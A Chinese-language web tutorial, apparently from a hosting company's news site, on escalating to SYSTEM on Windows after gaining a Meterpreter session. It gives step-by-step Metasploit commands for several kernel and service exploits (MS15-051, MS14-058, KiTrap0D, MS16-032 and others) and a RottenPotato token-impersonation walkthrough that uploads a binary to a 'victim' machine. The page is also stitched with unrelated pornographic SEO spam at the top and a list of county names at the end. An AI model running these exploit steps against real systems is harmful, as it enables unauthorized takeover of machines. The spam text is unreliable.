91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Windows內核漏洞利用提權

發布時間:2021-11-25 14:40:12 來源:億速云 閱讀:213 作者:柒染 欄目:編程語言

如何進行Windows內核漏洞利用提權,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

“使用自動化腳本進行Windows提權”,本文將介紹有關Windows內核漏洞提權的方法。我將使用內置的Metasploit模塊作為演示。

Windows-Exploit-suggester

Metasploit內置模塊提供了各種可用于提權的local exploits,并會基于架構,平臺(即運行的操作系統),會話類型和所需默認選項提供建議。這極大的節省了我們的時間,省去了我們手動搜索local exploits的麻煩。雖說如此,但也并非所有列出的local exploits都可用。所以,無論是漏洞利用還是查找最好的辦法就是自動結合手動。 

用法

注:要使用local exploit suggester,我們必須已在目標機器上獲取到了一個Meterpreter session。在運行Local Exploit suggester之前,我們需要將現有的Meterpreter session調到后臺運行(CTRL + Z)

示例,假設我們現在有一個Meterpreter session 1

use post/multi/recon/local_exploit_suggester
set LHOST 192.168.1.107
set SESSION 1
exploit

如下圖所示,它自動的為我們匹配出了一些可能的用于易受攻擊目標提權的漏洞利用模塊。

如何進行Windows內核漏洞利用提權

Windows ClientCopyImage Win32k Exploit

Windows內核模式驅動程序特權提升漏洞。此模塊利用了win32k.sys內核模式驅動程序中的不正確對象處理進行提權。

該模塊已在Windows 7 x64和x86,Windows 2008 R2 SP1 x64的易受攻擊版本上進行了測試。

讓我們轉到MSF控制臺并執行該漏洞的exploit模塊

use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執行,就會打開另一個Meterpreter session

getsystem
getuid

可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

如何進行Windows內核漏洞利用提權

Windows TrackPopupMenu Win32k NULL指針解引用

此模塊利用了win32k.sys中的NULL指針解引用,漏洞可通過TrackPopupMenu函數進行觸發。在特殊情況下,我們可以濫用在xxxSendMessageTimeout上的NULL指針解引用,來實現任意代碼執行操作。

該模塊已在Windows XP SP3,Windows Server 2003 SP2,Windows 7 SP1 Windows Server 2008 32位和Windows Server 2008 R2 SP1 64位上進行了測試。

讓我們轉到MSF控制臺并執行該漏洞的exploit模塊

use exploit/windows/local/ms14_058_track_popup_menu
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執行,就會打開另一個Meterpreter session

getsystem
getuid

可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

如何進行Windows內核漏洞利用提權

通過KiTrap0D提升Windows權限

此模塊將通過KiTrap0D exploit創建具有SYSTEM權限的新會話,如果當前使用的會話權限已提升,則exploit將不會運行。該模塊依賴于kitrap0d.x86.dll,因此在x64版本的Windows上不受支持。

該模塊已在32位的Windows Server 2003,Windows Server 2008,Windows 7和XP易受攻擊版本上進行了測試。

讓我們轉到MSF控制臺并執行該漏洞的exploit模塊

use exploit/windows/local/ms10_015_kitrap0d
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執行,就會打開另一個Meterpreter session

getsystem
getuid

可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

如何進行Windows內核漏洞利用提權

Task Scheduler XML提權

此漏洞發生在Task Scheduler中,可允許用戶提升權限。如果攻擊者登錄到受影響的系統,并運行特制應用程序,則該漏洞可能允許特權提升。攻擊者必須擁有有效的登錄憑據,并且能夠在本地登錄才能成功利用此漏洞。遠程或匿名用戶則無法利用此漏洞。

該模塊已在Windows Vista,Windows 7,Windows Server 2008 x64和x86的易受攻擊版本上進行了測試。

讓我們轉到MSF控制臺并執行該漏洞的exploit模塊

use exploit/windows/local/ms10_092_schelevator
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執行,就會打開另一個Meterpreter session

getsystem
getuid

可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

如何進行Windows內核漏洞利用提權

MS16-016 mrxdav.sys WebDav本地提權

此模塊利用了mrxdav.sys中的漏洞。其將在目標系統生成一個進程,并在執行payload之前將其權限提升到NT AUTHORITY\SYSTEM。

該模塊已在Windows 7 SP1,x86架構的易受攻擊版本上進行了測試。

讓我們轉到MSF控制臺并執行該漏洞的exploit模塊

use exploit/windows/local/ms16_016_webdav
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執行,就會打開另一個Meterpreter session

getsystem
getuid

可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

如何進行Windows內核漏洞利用提權

EPATHOBJ::pprFlattenRec本地提權

此模塊利用了EPATHOBJ :: pprFlattenRec上的漏洞,其主要問題出在使用了未初始化的數據(即允許損壞內存)。

目前,該模塊已在Windows XP SP3,Windows 2003 SP1和Windows 7 SP1上成功進行了測試。

讓我們轉到MSF控制臺并執行該漏洞的exploit模塊

use exploit/windows/local/ppr_flatten_rec
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執行,就會打開另一個Meterpreter session

getsystem
getuid

可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

如何進行Windows內核漏洞利用提權

MS13-053 : NTUserMessageCall Win32k內核池溢出

Win32k中的內核池溢出漏洞,可允許本地用戶提權。內核shellcode使winlogon.exe進程的ACL為NULL(SYSTEM進程)。這將允許任何非特權進程自由遷移到winlogon.exe,從而提升用戶權限。注意:退出meterpreter會話時,可能會導致winlogon.exe崩潰。

目前,該模塊已在Windows 7 SP1 x86上成功測試。

讓我們轉到MSF控制臺并執行該漏洞的exploit模塊

use exploit/windows/local/ms13_053_ schlamperei
set lhost 192.168.1.107
set session 1
exploit

一旦exploit成功執行,就會打開另一個Meterpreter session

getsystem
getuid

可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

如何進行Windows內核漏洞利用提權

MS16-032 Secondary Logon Handle提權

此模塊利用了Windows Secondary Logon Service中缺少標準句柄過濾的問題。該漏洞主要影響Windows 7-10和2k8-2k12 32/64位版本。此模塊僅適用于具有Powershell 2.0或更高版本的Windows系統,以及具有至少兩個或以上CPU內核的系統。

use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
set session 1
exploit

一旦exploit成功執行,就會打開另一個Meterpreter session

getsystem
getuid

可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

如何進行Windows內核漏洞利用提權

RottenPotato

使用RottenPotato將服務帳戶本地提權至SYSTEM。

首先,我們在meterpreter會話中使用以下選項查看當前系統上是否存在任何有效tokens。

load incognito
list_token -u

可以看到,當前并沒有任何token可用。

如何進行Windows內核漏洞利用提權

現在,我們從github下載Rottenpotato

git clone https://github.com/foxglovesec/RottenPotato.git
cd RottenPotato

下載完成后我們會在Rottenpotato目錄下,看到一個rottenpotato.exe文件。

將該文件上傳至受害者機器。

upload /root/Desktop/RottenPotato/rottenpotato.exe .

如何進行Windows內核漏洞利用提權

然后,鍵入以下命令執行該exe文件,并將SYSTEM token添加到impersonate user tokens下。

execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

可以看到,我們當前的用戶權限已提升為了NT AUTHORITY\SYSTEM

如何進行Windows內核漏洞利用提權

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

崇义县| 从化市| 灌云县| 吕梁市| 汉阴县| 赞皇县| 繁昌县| 双城市| 杭锦旗| 合水县| 师宗县| 闽侯县| 稻城县| 珠海市| 察哈| 澄江县| 铁力市| 开远市| 建湖县| 白银市| 辰溪县| 武乡县| 宜都市| 弥勒县| 印江| 玉门市| 大安市| 綦江县| 郁南县| 象州县| 邵阳市| 始兴县| 天台县| 辽宁省| 娄烦县| 太和县| 商城县| 赤城县| 波密县| 孟津县| 泽州县|